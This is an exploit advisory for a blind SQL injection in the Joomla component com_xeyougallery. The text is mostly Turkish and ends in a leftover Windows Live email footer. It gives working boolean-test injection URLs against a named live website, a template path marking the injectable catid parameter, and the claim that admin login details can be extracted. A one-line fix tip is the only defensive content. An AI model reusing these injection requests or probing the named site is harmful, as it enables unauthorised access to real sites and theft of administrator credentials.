<------------------- header data start ------------------- >

#####################################################################
#Joomla Component com_xeyougallery Blind SQL injection Vulnerability                                           #
#####################################################################

# author          : Fl0riX

# Home           : www.Cyber-Warrior.Org

# Name           : com_xeyougallery

# Bug Type      : (Blind) SQL Injection

# Infection       : Admin login bilgileri alınabilir.

# Demo Vuln.    :
TRUE(+)
» http://sim-3d.com/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=1 and 1=1
FALSE(-)
» http://sim-3d.com/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=1 and 1=0

# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=[SQL INJ.]

< -- bug code end of -- >

 		 	   		  
_________________________________________________________________
Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010